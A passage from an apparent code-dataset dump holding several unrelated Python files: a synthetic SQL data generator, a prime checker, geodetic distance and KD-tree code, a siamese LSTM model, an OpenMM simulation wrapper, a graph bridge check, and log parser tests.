generations!\n match_simple(lm,lf,drelationships,True)\n lnextgen = []\n for f in lf:\n lchildren = make_children(arrayid,f,dentities,drelationships)\n lnextgen.extend(lchildren)\n maxcarryover = int(len(lcurrgen)*self.pct_carry_over_currgen_2_nextgen/100)\n if maxcarryover > 0:\n numcarryover = self.u.rand_int(0,maxcarryover)\n if numcarryover > 0:\n carryover = self.u.choose_objs_from(lcurrgen,numcarryover)\n if len(carryover) != 0:\n lnextgen.extend(carryover)\n lcurrgen = lnextgen\n\n def make_people_origin(arrayid,dentities):\n lastnames = self.make_last_names(self.num_original_descendants)\n firstnames = self.make_first_names(self.num_original_descendants)\n l_m = []\n l_f = []\n\n for ln,fn in zip(lastnames,firstnames):\n etype = self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_PERSON])\n entity = {\n self.S_ID:arrayid[0],\n self.S_ENTITY_FIRSTNAME:fn,\n self.S_ENTITY_LASTNAME:ln,\n self.S_ENTITY_TYPE:etype[0]\n }\n if etype[0] == self.S_ENTITY_FEMALE:\n l_f.append(entity)\n elif etype[0] == self.S_ENTITY_MALE:\n l_m.append(entity)\n dentities[arrayid[0]] = entity\n arrayid[0] += 1\n if arrayid[0] >= self.max_num_person:\n break\n\n assert len(l_f) != 0, 'no female originators were generated'\n assert len(l_m) != 0, 'no male originators were generated'\n\n\n id = 0\n arrayid = [id]\n make_people_origin(arrayid,dentities)\n make_people_relationships(arrayid,dentities,drelationships)\n return\n\n def make_inventory_catalog(self):\n '''\n produce a dictionary of consumables and durables with msrp\n each consumable has 5 levels of expense, 1-5, with mean at 3\n each entity has 5 levels of affordability, 1-5, mean at 3\n each city has 5 levels of affordability, 1-5, with mean at 3\n\n for each subcategory, assign weights where one item is more expensive than another\n then for each item, have 5 different levels of expense\n\n this structure should be such that you can pick an item from subcategory,\n and choose which level of expense from that item.\n eg choose fruits:\n apple $1\n level0: $0.50\n level1: $0.75\n level2: $1\n level3: $2\n level4: $5\n banana $3\n level0: $0.50\n level1: $1\n level2: $3\n level3: $7\n level4: $10\n orange $5\n level0: $1\n level1: $3\n level2: $5\n level3: $10\n level4: $12\n\n that means for each subcategory, each item is already preranked by cost\n '''\n\n def select_inventory_recursive(inventory,dresult,pct_to_select,expense_level_min,expense_level_max):\n if isinstance(inventory,dict):\n for k,v in inventory.items():\n select_inventory_recursive(v,dresult,pct_to_select,expense_level_min,expense_level_max)\n elif isinstance(inventory,list):\n for item in inventory:\n if self.u.rand_bool(pct_to_select):\n pricepoints = item[self.S_ARRAY_PRICEPOINTS]\n for i in range(len(pricepoints)):\n if i >= expense_level_min and i <= expense_level_max:\n if self.u.rand_bool(self.S_SELECT_LIKELY_PCT):\n pricepoint = pricepoints[i]\n if item[self.S_ITEM_NAME] not in dresult:\n dresult[item[self.S_ITEM_NAME]] = {} # create the per-item dict once so earlier selected levels are not wiped out\n dresult[item[self.S_ITEM_NAME]][i] = pricepoint\n\n def make_inventory_for_business(keys_categories,inventory_all,pct_to_select_min,pct_to_select_max,\n expense_level_min,expense_level_max,markup_pct_min,markup_pct_max):\n\n assert pct_to_select_min >= 0 and pct_to_select_max <= 100 and pct_to_select_min <= pct_to_select_max\n assert expense_level_min >= 0 and expense_level_max <= 4 and expense_level_min < expense_level_max\n assert markup_pct_min >= 0 and markup_pct_max <= 200 and markup_pct_min < markup_pct_max # callers generate markups up to 160 pct, so the old <= 100 bound always tripped\n\n dinventory = {}\n\n for key_category in keys_categories:\n if key_category not in inventory_all:\n raise Exception('{} is not a valid inventory category key'.format(key_category))\n inventory_category = inventory_all[key_category]\n pct_to_select = self.u.rand_int_inclusive(pct_to_select_min,pct_to_select_max)\n select_inventory_recursive(inventory_category,dinventory,pct_to_select,expense_level_min,expense_level_max)\n\n for item,pricepoints in dinventory.items():\n for level,pricepoint in pricepoints.items():\n markup = self.u.rand_int_inclusive(markup_pct_min,markup_pct_max)\n markup_pricepoint = int(pricepoint * markup/100)\n pricepoints[level] = markup_pricepoint\n\n return dinventory\n\n def make_inventory_for_businesses():\n inventory_all = self.inventory\n keys_categories = [self.u.choice([self.S_CAT_CONSUME,self.S_CAT_DURABLES])]\n pct_to_select_min = self.S_PCT_TO_SELECT_MIN\n pct_to_select_max = self.S_PCT_TO_SELECT_MAX\n expense_level_mu = self.u.rand_int(self.S_EXPENSE_LEVEL_MIN,self.S_EXPENSE_LEVEL_MAX)\n expense_level_min = expense_level_mu if expense_level_mu == self.S_EXPENSE_LEVEL_MIN else (expense_level_mu-1)\n expense_level_max = expense_level_mu if expense_level_mu == self.S_EXPENSE_LEVEL_MAX else (expense_level_mu+1)\n markup_pct_mu = self.u.rand_int(75,150)\n markup_pct_min = markup_pct_mu-10\n markup_pct_max = markup_pct_mu+10\n dinventory = make_inventory_for_business(keys_categories,inventory_all,pct_to_select_min,pct_to_select_max,\n expense_level_min,expense_level_max,markup_pct_min,markup_pct_max)\n return dinventory # return the selection instead of silently discarding it\n\n def make_catalog_all():\n dentities = self.entity_types\n inventory = self.inventory\n dmsrp = self.d_msrp\n\n inventory[self.S_CAT_CONSUME] = {}\n inventory[self.S_CAT_DURABLES] = {}\n\n for ksubcategories,items in dentities[self.S_CAT_CONSUME].items():\n inventory[self.S_CAT_CONSUME][ksubcategories] = {}\n inventory[self.S_CAT_CONSUME][ksubcategories][self.S_ARRAY] = []\n for item in items:\n msrp = self.u.rand_int_pct(dmsrp[ksubcategories],self.S_CONSUME_MSRP_MIN_PCT,self.S_CONSUME_MSRP_MAX_PCT)\n pricepoints = self.u.get_vals_from_pct(msrp,self.S_CONSUME_PRICEPOINTS_PCT)\n item_obj = {\n self.S_ITEM_NAME:item,\n self.S_MSRP:msrp,\n self.S_ARRAY_PRICEPOINTS:pricepoints\n }\n inventory[self.S_CAT_CONSUME][ksubcategories][self.S_ARRAY].append(item_obj)\n for ksubcategories,items in dentities[self.S_CAT_DURABLES].items():\n inventory[self.S_CAT_DURABLES][ksubcategories] = {}\n inventory[self.S_CAT_DURABLES][ksubcategories][self.S_ARRAY] = []\n for item in items:\n msrp = self.u.rand_int_pct(dmsrp[ksubcategories],self.S_DURABLE_MSRP_MIN_PCT,self.S_DURABLE_MSRP_MAX_PCT)\n pricepoints = self.u.get_vals_from_pct(msrp,self.S_DURABLE_PRICEPOINTS_PCT)\n 
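# Worked example of the price-point expansion above (hypothetical numbers, and assuming get_vals_from_pct scales msrp by each percentage in the S_*_PRICEPOINTS_PCT tuple): an msrp of 20 with percentages (25,50,100,200,300) would yield pricepoints [5,10,20,40,60] -- the five preranked expense levels per item described in the make_inventory_catalog docstring.\n 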
item_obj = {\n self.S_ITEM_NAME:item,\n self.S_MSRP:msrp,\n self.S_ARRAY_PRICEPOINTS:pricepoints\n }\n inventory[self.S_CAT_DURABLES][ksubcategories][self.S_ARRAY].append(item_obj)\n\n daddr = self.data_addresses\n\n make_catalog_all()\n\n\n # first find how many businesses there are. take about 50% of those for combination\n # of consume and durables. make random between 40-90% consumable, and durables as 10-60%\n\n\n def make_transaction_receipts(self, data_geo, data_entities, data_inventory):\n '''\n\n '''\n return\n\n\n def recurse_entity_types_old(self,d,level,category,subcat0,subcat1,patharraybuf,tentryarraybuf,detype2id,arrayid):\n if isinstance(d,dict):\n for k,v in d.items():\n patharraybuf.append(k)\n if k in detype2id:\n assert k not in detype2id\n detype2id[k] = arrayid[0]\n if level == 0:\n tentryarraybuf.append('insert into entity_types(id,category,value) values({},\"{}\",\"{}\")'\n .format(arrayid[0],k,k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,k,None,None,patharraybuf,tentryarraybuf,detype2id,arrayid)\n elif level == 1:\n fullpathval = ','.join(patharraybuf)\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,k,fullpathval,k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,category,k,None,patharraybuf,tentryarraybuf,detype2id,arrayid)\n else:\n fullpathval = ','.join(patharraybuf)\n cur_subcat1 = subcat1 if subcat1 is not None else k\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,subcat1,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,subcat0,cur_subcat1,fullpathval,k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,category,subcat0,subcat1,patharraybuf,tentryarraybuf,detype2id,arrayid)\n patharraybuf.pop()\n elif isinstance(d,list):\n for v in d:\n fullpathval = ','.join(patharraybuf)\n if v in detype2id:\n assert v not in detype2id\n detype2id[v] = arrayid[0]\n if level == 0:\n tentryarraybuf.append('insert into entity_types(id,category,fullpath,value) values({},\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,fullpathval,v))\n arrayid[0] += 1\n elif level == 1:\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,subcat0,fullpathval,v))\n arrayid[0] += 1\n else:\n tentryarraybuf.append('insert into entity_types(id,category,subcat0,subcat1,fullpath,value) values({},\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n .format(arrayid[0],category,subcat0,subcat1,fullpathval,v))\n arrayid[0] += 1\n else:\n raise Exception('ERROR unrecognized format in make_sql_tables for d: {}'.format(d))\n\n def recurse_entity_types(self,d,level,category,subcat0,subcat1,patharraybuf,tentryarraybuf,detype2id,arrayid):\n if isinstance(d,dict):\n for k,v in d.items():\n patharraybuf.append(k)\n if k in detype2id:\n assert k not in detype2id\n detype2id[k] = arrayid[0]\n fullpath = None\n if len(patharraybuf) != 0:\n fullpath = ','.join(patharraybuf)\n tentryarraybuf.append('insert into entity_types(id,value,fullpath) values({},\"{}\",\"{}\");'.format(arrayid[0],k,fullpath))\n else:\n tentryarraybuf.append('insert into entity_types(id,value) values({},\"{}\");'.format(arrayid[0],k))\n arrayid[0] += 1\n self.recurse_entity_types(v,level+1,k,None,None,patharraybuf,tentryarraybuf,detype2id,arrayid)\n patharraybuf.pop()\n elif isinstance(d,list):\n for v in d:\n fullpathval = ','.join(patharraybuf)\n if 
v in detype2id:\n assert v not in detype2id\n detype2id[v] = arrayid[0]\n tentryarraybuf.append('insert into entity_types(id,value,fullpath) values({},\"{}\",\"{}\");'.format(arrayid[0],v,fullpathval))\n arrayid[0] += 1\n\n else:\n raise Exception('ERROR unrecognized format in make_sql_tables for d: {}'.format(d))\n\n\n def make_sql_tables(self, do_print=True):\n\n # entity_type\n detype2id = {}\n id = 0\n arrayid = [id]\n entity_types = self.entity_types\n tentitytypes = []\n #tentitytypes.append('create table entity_types(id integer primary key, category text, subcat0 text, subcat1 text, fullpath text, value text)')\n tentitytypes.append('create table entity_types(id integer primary key, value text, fullpath text);')\n self.recurse_entity_types(entity_types,0,None,None,None,[],tentitytypes,detype2id,arrayid)\n\n print('-------------------ENTITY_TYPES')\n for line in tentitytypes:\n print(line)\n\n\n # cities and addresses\n tcities = []\n tcities.append('create table cities(id integer primary key, state text, city text, base_zip integer);')\n taddress = []\n taddress.append('create table addresses(id integer primary key autoincrement, id_city integer, street text, address_id integer, unit integer, zip integer, id_type);')\n data_addresses = self.data_addresses\n idcity = 0\n for statename,stateval in data_addresses[self.S_DATAKEY_STATES].items():\n for cityname,cityval in stateval[self.S_DATAKEY_CITIES].items():\n tcities.append('insert into cities(id,state,city,base_zip) values(\"{}\",\"{}\",\"{}\",{});'\n .format(idcity,statename,cityname,cityval[self.S_KEY_CITY_BASE_ZIP]))\n for streetname,streetval in cityval[self.S_DATAKEY_STREETS].items():\n for addressname,addressval in streetval[self.S_DATAKEY_ADDRS].items():\n if self.S_DATAKEY_ADDR_UNITS in addressval:\n for unitid,unitval in addressval[self.S_DATAKEY_ADDR_UNITS].items():\n try:\n address_id = addressname # addressval[self.S_DATAKEY_ADDR_NUM_ID]\n unit = addressval[self.S_DATAKEY_ADDR_UNIT_ID] # if self.S_DATAKEY_ADDR_UNIT_ID in addressval else None\n zip = addressval[self.S_DATAKEY_ADDR_ZIP]\n id_type = addressval[self.S_DATAKEY_ADDR_TYPE]\n taddress.append('insert into addresses(id_city,street,address_id,unit,zip,id_type) values({},\"{}\",{},{},{},\"{}\");'\n .format(idcity,streetname,address_id,unit,zip,id_type))\n #if unit == None:\n # taddress.append('insert into addresses(id_city,street,address_id,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,zip,id_type))\n #else:\n # taddress.append('insert into addresses(id_city,street,address_id,unit,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,unit,zip,id_type))\n except Exception as e:\n print('ERROR: {}'.format(e))\n else:\n try:\n address_id = addressname # addressval[self.S_DATAKEY_ADDR_NUM_ID]\n #unit = addressval[self.S_DATAKEY_ADDR_UNIT_ID] if self.S_DATAKEY_ADDR_UNIT_ID in addressval else None\n zip = addressval[self.S_DATAKEY_ADDR_ZIP]\n id_type = addressval[self.S_DATAKEY_ADDR_TYPE]\n taddress.append('insert into addresses(id_city,street,address_id,zip,id_type) values({},\"{}\",{},{},\"{}\");'\n .format(idcity,streetname,address_id,zip,id_type))\n #if unit == None:\n # taddress.append('insert into addresses(id_city,street,address_id,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,zip,id_type))\n #else:\n # taddress.append('insert into addresses(id_city,street,address_id,unit,zip,id_type) values(\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'\n # .format(idcity,streetname,address_id,unit,zip,id_type))\n except Exception as e:\n print('ERROR: {}'.format(e))\n idcity += 1\n print('-------------------CITIES')\n for line in tcities:\n print(line)\n print('-------------------ADDRESSES')\n for line in taddress:\n print(line)\n\n # entities\n data_entities = self.data_entities\n tentities = []\n tentities.append('create table entities(gid integer primary key, id_entity_category integer, id integer, firstname text, lastname text, id_entity_type, startdate date, enddate date);')\n for entity_category,entities in data_entities.items():\n id_entity_category = detype2id[entity_category]\n for k,v in entities.items():\n try:\n id = v[self.S_ID]\n firstname = v[self.S_ENTITY_FIRSTNAME] if self.S_ENTITY_FIRSTNAME in v else None\n lastname = v[self.S_ENTITY_LASTNAME] if self.S_ENTITY_LASTNAME in v else None\n entity_type = v[self.S_ENTITY_TYPE]\n startdate = v[self.S_ENTITY_START_DATE] if self.S_ENTITY_START_DATE in v else None\n enddate = v[self.S_ENTITY_END_DATE] if self.S_ENTITY_END_DATE in v else None\n keys = ['id_entity_category','id']\n values = [id_entity_category,id]\n if firstname is not None:\n keys.append('firstname')\n values.append('\"{}\"'.format(firstname))\n if lastname is not None:\n keys.append('lastname')\n values.append('\"{}\"'.format(lastname))\n keys.append('id_entity_type')\n values.append('\"{}\"'.format(entity_type))\n strkeys = ','.join(keys)\n aryvals = ['{}'.format(v) for v in values]\n strvals = ','.join(aryvals)\n tentities.append('insert into entities({}) values({});'.format(strkeys,strvals))\n except Exception as e:\n print(e)\n print('-------------------ENTITIES')\n for line in tentities:\n print(line)\n\n # entity_relationships\n data_relationships = self.data_relationships\n trelationships = []\n trelationships.append('create table relationships(gid integer primary key, id_src, id_dst, id_relationship_type);')\n for idsrc,relationships in data_relationships.items():\n for relationship_type,array_iddst in relationships.items():\n id_relationship_type = detype2id[relationship_type]\n for iddst in array_iddst:\n trelationships.append('insert into relationships(id_src,id_dst,id_relationship_type) values ({},{},{});'.format(idsrc,iddst,id_relationship_type))\n\n print('-------------------RELATIONSHIPS')\n for line in trelationships:\n print(line)\n\nclass ut(unittest.TestCase):\n '''\n def __init__(self):\n pass\n __init__ gets overridden, so don't define it\n '''\n def test_generate_db_data(self):\n\n def construct_database_0():\n t = sql_data_maker()\n data = t.make_table_cities(num_states=10,min_cities_per_state=2,max_cities_per_state=6)\n #print('\\n')\n etypes = t.choose_type([sql_data_maker.S_CAT_ADDR,sql_data_maker.S_ADDR_RES],5)\n #print(etypes)\n #print('\\n')\n etypes = t.choose_type([sql_data_maker.S_CAT_CONSUME,sql_data_maker.S_CONSUME_GRAINS],5)\n #print(etypes)\n t.make_table_addresses(data,3,8)\n json_val = json.dumps(data,indent=4,sort_keys=True)\n print(json_val)\n return\n\n def test_make_table_entities():\n t = sql_data_maker()\n t.num_original_descendants = 10\n t.max_num_person = 500\n t.max_num_virtual = 100\n t.max_num_animal = 1000\n\n data = t.make_table_cities(num_states=10,min_cities_per_state=5,max_cities_per_state=10)\n t.make_table_addresses(data,min_num_streets=3,max_num_streets=10)\n\n (entities,relationships) = t.make_table_entities()\n\n json_val = json.dumps(entities,indent=4,sort_keys=True)\n #print('----------------------entities')\n 
#print(json_val)\n\n json_val = json.dumps(relationships,indent=4,sort_keys=True)\n #print('----------------------relationships')\n #print(json_val)\n\n t.make_inventory_catalog()\n\n #t.make_sql_tables()\n\n return\n\n #construct_database_0()\n test_make_table_entities()\n\n","sub_path":"src/main/db/make_sql_data.py","file_name":"make_sql_data.py","file_ext":"py","file_size_in_byte":51844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"130595301","text":"def prime(n):\n count=0\n for i in range(1,n+1):\n if(n%i==0):\n count=count+1\n return count==2\nN=int(input())\nif(N%2==0):\n print(\"valid\")\nelif(prime(N)):\n print(\"valid\")\nelse:\n print(\"invalid\")\n","sub_path":"20-01-19/20-01.py","file_name":"20-01.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"10545901","text":"# -*- coding: utf-8 -*-\nimport numpy\nfrom django.db.models import Q\nfrom math import sin, cos, sqrt, atan2, radians\nfrom scipy.spatial import KDTree\n\nfrom inguri.core.models import Entity\n\n\n# Constants defined by the World Geodetic System 1984 (WGS84)\nA = 6378.137\nB = 6356.7523142\nESQ = 6.69437999014 * 0.001\n\n\ndef distance(objA_latitude, objA_longitude, objB_latitude, objB_longitude):\n \"\"\" Great-circle (haversine) distance in km between two objects\n \"\"\"\n try:\n lat1 = radians(float(objA_latitude))\n lon1 = radians(float(objA_longitude))\n lat2 = radians(float(objB_latitude))\n lon2 = radians(float(objB_longitude))\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = (sin(dlat/2))**2 + cos(lat1) * cos(lat2) * (sin(dlon/2))**2\n c = 2 * atan2(sqrt(a), sqrt(1-a))\n return round(6373.0 * c, 2)\n except (TypeError, ValueError):\n raise Exception(\"Lat/Lon not provided\")\n\n\ndef geodetic2ecef(lat, lon, alt=0):\n \"\"\"Convert geodetic coordinates to ECEF.\"\"\"\n lat, lon = radians(lat), radians(lon)\n xi = sqrt(1 - ESQ * sin(lat) ** 2)\n x = (A / xi + alt) * cos(lat) * cos(lon)\n y = (A / xi + alt) * cos(lat) * sin(lon)\n z = (A / xi * (1 - ESQ) + alt) * sin(lat)\n return x, y, z\n\n\ndef euclidean_distance(distance):\n \"\"\"Return the approximate Euclidean distance corresponding to the\n given great circle distance (in km).\n \"\"\"\n return 2 * A * sin(distance / (2 * B))\n\n\ndef calculate_closest_objects(radius, queryset=None, model=None):\n if queryset:\n queryset = queryset.exclude(Q(latitude=None) | Q(longitude=None))\n elif model:\n queryset = model.objects.exclude(Q(latitude=None) | Q(longitude=None))\n else:\n raise Exception(\"Either Queryset or Model must be given\")\n\n focus_entities = Entity.objects.filter(taxonomy__focus=True) \\\n .exclude(Q(latitude=None) | Q(longitude=None))\n\n objects = queryset | focus_entities\n\n ecef_objects = [geodetic2ecef(o.latitude, o.longitude) for o in objects]\n tree = KDTree(numpy.array(ecef_objects))\n R = euclidean_distance(radius)\n\n for i, obj in enumerate(ecef_objects):\n if objects[i] not in queryset:\n continue\n results = tree.query_ball_point([obj], r=R)[0]\n closest = [objects[r] for r in results if objects[r].taxonomy.focus]\n if objects[i] in closest:\n closest.remove(objects[i])\n objects[i].closest.clear()\n objects[i].closest.add(*closest)\n","sub_path":"inguri/utils/maps/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
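The record above leans on one non-obvious trick: a KD-tree measures straight-line (chord) distance, so geodetic2ecef() maps every lat/lon onto 3-D Cartesian space and euclidean_distance() converts the great-circle search radius into the chord it subtends before query_ball_point is called. A minimal self-contained sketch of the same technique (assuming a spherical Earth rather than the record's WGS84 ellipsoid; the city coordinates and the 350 km radius are made-up test values):

import numpy as np
from math import cos, radians, sin
from scipy.spatial import cKDTree

R_KM = 6371.0  # mean Earth radius; spherical stand-in for the WGS84 constants above

def to_ecef(lat, lon):
    # map latitude/longitude onto 3-D Cartesian coordinates (km)
    lat, lon = radians(lat), radians(lon)
    return (R_KM * cos(lat) * cos(lon), R_KM * cos(lat) * sin(lon), R_KM * sin(lat))

def chord_length(arc_km):
    # convert a great-circle radius into the straight-line chord it subtends,
    # which is the distance a KD-tree ball query actually measures
    return 2 * R_KM * sin(arc_km / (2 * R_KM))

# made-up test points: Lisbon, Porto, Madrid
points = np.array([to_ecef(38.72, -9.14), to_ecef(41.15, -8.61), to_ecef(40.42, -3.70)])
tree = cKDTree(points)
hits = tree.query_ball_point(points[0], r=chord_length(350.0))
print(hits)  # indices 0 (Lisbon itself) and 1 (Porto, ~275 km); Madrid (~500 km) is excluded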
+{"seq_id":"3694203","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import LSTM, Bidirectional, Dense, Input, Dropout, Lambda\nfrom tensorflow.keras.regularizers import l2\nfrom src.common import Common\nfrom src.model_architectures.model_functions import create_embeddings, l1_distance\n\ndef siamese_network(input_shape):\n # Defines our inputs\n left_title = Input(input_shape, dtype='string')\n right_title = Input(input_shape, dtype='string')\n \n # Create embeddings\n CreateEmbeddings = Lambda(create_embeddings, output_shape=(None, Common.MAX_LEN, Common.EMBEDDING_SHAPE[0]))\n left_embeddings = CreateEmbeddings(left_title)\n right_embeddings = CreateEmbeddings(right_title)\n \n # The LSTM units\n model = tf.keras.Sequential(name='siamese_model')\n model.add(Bidirectional(LSTM(units=128,\n name='lstm_1',\n return_sequences=True,\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n model.add(Bidirectional(LSTM(units=64,\n name='lstm_2',\n return_sequences=True,\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n model.add(Bidirectional(LSTM(units=64,\n name='lstm_3',\n return_sequences=True,\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n model.add(Bidirectional(LSTM(units=64,\n #return_sequences=True,\n name='lstm_4',\n activity_regularizer=l2(0.007),\n recurrent_regularizer=l2(0.0002), \n kernel_regularizer=l2(0.0002))))\n model.add(Dropout(rate=0.5))\n # The dense layers\n model.add(Dense(units=512, activation='elu', name='dense_1'))\n model.add(Dropout(rate=0.6))\n model.add(Dense(units=256, activation='elu', name='dense_2'))\n \n # Forward propagate through the model to generate the encodings\n encoded_left_title = model(left_embeddings)\n encoded_right_title = model(right_embeddings)\n\n # Take the L1 difference between the embeddings\n Distance = Lambda(l1_distance)\n distance = Distance([encoded_left_title, encoded_right_title])\n \n # Send the distance to a dense layer\n distance = Dense(units=128, activation='elu', name='dense_3')(distance)\n\n # Send the dense layer to the sigmoid classifier\n distance = Dropout(0.5)(distance)\n prediction = Dense(units=1, activation='sigmoid', kernel_regularizer=l2(0.0001))(distance)\n \n # Create and return the network\n siamese_net = tf.keras.Model(inputs=[left_title, right_title], outputs=prediction, name='siamese_network')\n return siamese_net\n","sub_path":"legacy/distance_sigmoid.py","file_name":"distance_sigmoid.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"636452450","text":"from io import StringIO\n\nimport numpy as np\nimport simtk.openmm as mm\nfrom simtk import unit\nfrom simtk.openmm import app\n\nfrom rlmm.utils.config import Config\n\n\nclass SystemParams(Config):\n def __init__(self, config_dict):\n for k, v in config_dict.items():\n if isinstance(v, dict):\n for k_, v_ in v.items():\n exec('v[k_] = ' + v_)\n else:\n exec('config_dict[k] = ' + str(v))\n self.__dict__.update(config_dict)\n\n\nclass OpenMMSimulationWrapper:\n class Config(Config):\n def __init__(self, args):\n self.parameters = SystemParams(args['params'])\n self.systemloader = None\n if args is not None:\n self.__dict__.update(args)\n\n def get_obj(self, system_loader):\n 
self.systemloader = system_loader\n return OpenMMSimulationWrapper(self)\n\n def __init__(self, config_: Config):\n \"\"\"\n\n :param systemLoader:\n :param config:\n \"\"\"\n self.config = config_\n system = self.config.systemloader.get_system(self.config.parameters.createSystem)\n\n integrator = self.config.parameters.integrator(*self.config.parameters.integrator_params.values())\n\n integrator.setConstraintTolerance(self.config.parameters.integrator_setConstraintTolerance)\n\n # prepare simulation\n self.simulation = app.Simulation(self.config.systemloader.get_topology(), system, integrator,\n self.config.parameters.platform)\n self.simulation.context.setPositions(self.config.systemloader.get_positions())\n\n # minimize\n self.simulation.minimizeEnergy()\n\n # equilibrate for 100 steps\n self.simulation.context.setVelocitiesToTemperature(self.config.parameters.integrator_params['temperature'])\n\n def translate(self, x, y, z, minimize=True):\n \"\"\"\n\n :param x:\n :param y:\n :param z:\n :param minimize:\n \"\"\"\n pos = self.simulation.context.getState(getPositions=True, getVelocities=True)\n pos = pos.getPositions(asNumpy=True)\n # pos[5082:5125] += np.array([x, y, z]) * unit.angstrom\n\n if minimize:\n self.simulation.minimizeEnergy()\n self.simulation.context.setVelocitiesToTemperature(self.config.parameters.integrator_params['temperature'])\n\n def run(self, steps):\n \"\"\"\n\n :param steps:\n \"\"\"\n self.simulation.step(steps)\n\n def get_coordinates(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self.simulation.context.getState(getPositions=True).getPositions(asNumpy=True)\n\n def get_pdb(self):\n \"\"\"\n\n :return:\n \"\"\"\n output = StringIO()\n app.PDBFile.writeFile(self.simulation.topology,\n self.simulation.context.getState(getPositions=True).getPositions(),\n file=output)\n return output.getvalue()\n","sub_path":"rlmm/environment/openmmWrapper.py","file_name":"openmmWrapper.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"71734303","text":"# O(v + e) time | O(v) space - where v is the number of\r\n# vertices and e is the number of edges in the graph\r\ndef twoEdgeConnectedGraph(edges):\r\n if len(edges) == 0:\r\n\r\n return True\r\n arrivalTimes = [-1] * len(edges)\r\n startVertex = 0\r\n if getMinimumArrivalTimeOfAncestors(startVertex, -1, 0, arrivalTimes, edges) == -1:\r\n return False\r\n return areAllVerticesVisited(arrivalTimes)\r\n\r\ndef areAllVerticesVisited(arrivalTimes):\r\n for time in arrivalTimes:\r\n if time == -1:\r\n return False\r\n return True\r\n\r\ndef getMinimumArrivalTimeOfAncestors(currentVertex, parent, currentTime, arrivalTimes, edges):\r\n arrivalTimes[currentVertex] = currentTime\r\n minimumArrivalTime = currentTime\r\n for destination in edges[currentVertex]:\r\n if arrivalTimes[destination] == -1:\r\n minimumArrivalTime = min(\r\n minimumArrivalTime,\r\n getMinimumArrivalTimeOfAncestors(destination, currentVertex, currentTime + 1, arrivalTimes, edges),\r\n )\r\n elif destination != parent:\r\n minimumArrivalTime = min(minimumArrivalTime, arrivalTimes[destination])\r\n # A bridge was detected, which means the graph isn't two-edge-connected.\r\n if minimumArrivalTime == currentTime and parent != -1:\r\n return -1\r\n return minimumArrivalTime","sub_path":"graph/Two-Connected 
Graph/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"327146681","text":"from __future__ import print_function, division, absolute_import\nfrom fluenpy.parser import TextParser\nimport time\n\n\ndef test_apache():\n parser = TextParser()\n parser.configure({'format': 'apache'})\n t, record = parser.parse('192.168.0.1 - - [28/Feb/2013:12:00:00 +0100] \"GET / HTTP/1.1\" 200 777')\n tm = time.gmtime(t)\n assert tm.tm_year == 2013\n assert tm.tm_mon == 2\n assert tm.tm_mday == 28\n assert tm.tm_hour == 11\n assert record == {\n 'user': '-',\n 'method': 'GET',\n 'code': '200',\n 'size': '777',\n 'host': '192.168.0.1',\n 'path': '/',\n }\n\ndef test_apache2():\n parser = TextParser()\n parser.configure({'format': 'apache2'})\n t, record = parser.parse('192.168.0.1 - - [27/Feb/2013:20:00:00 -0900] \"GET / HTTP/1.1\" 200 777 \"-\" \"Opera/12.0\"')\n tm = time.gmtime(t)\n assert tm.tm_year == 2013\n assert tm.tm_mon == 2\n assert tm.tm_mday == 28\n assert tm.tm_hour == 5\n assert record == {\n 'user' : None,\n 'method' : 'GET',\n 'code' : 200,\n 'size' : 777,\n 'host' : '192.168.0.1',\n 'path' : '/',\n 'referer': None,\n 'agent' : 'Opera/12.0'\n }\n\ndef test_syslog():\n parser = TextParser()\n parser.configure({'format': 'syslog'})\n t, record = parser.parse('Feb 28 12:00:00 192.168.0.1 fluentd[11111]: [error] Syslog test')\n tm = time.gmtime(t)\n now = time.gmtime()\n assert tm.tm_year == now.tm_year\n assert tm.tm_mon == 2\n assert tm.tm_mday == 28\n assert tm.tm_hour == 12\n assert tm.tm_min == 0\n assert tm.tm_sec == 0\n assert record == {\n 'host' : '192.168.0.1',\n 'ident' : 'fluentd',\n 'pid' : '11111',\n 'message': '[error] Syslog test',\n }\n\ndef test_json():\n parser = 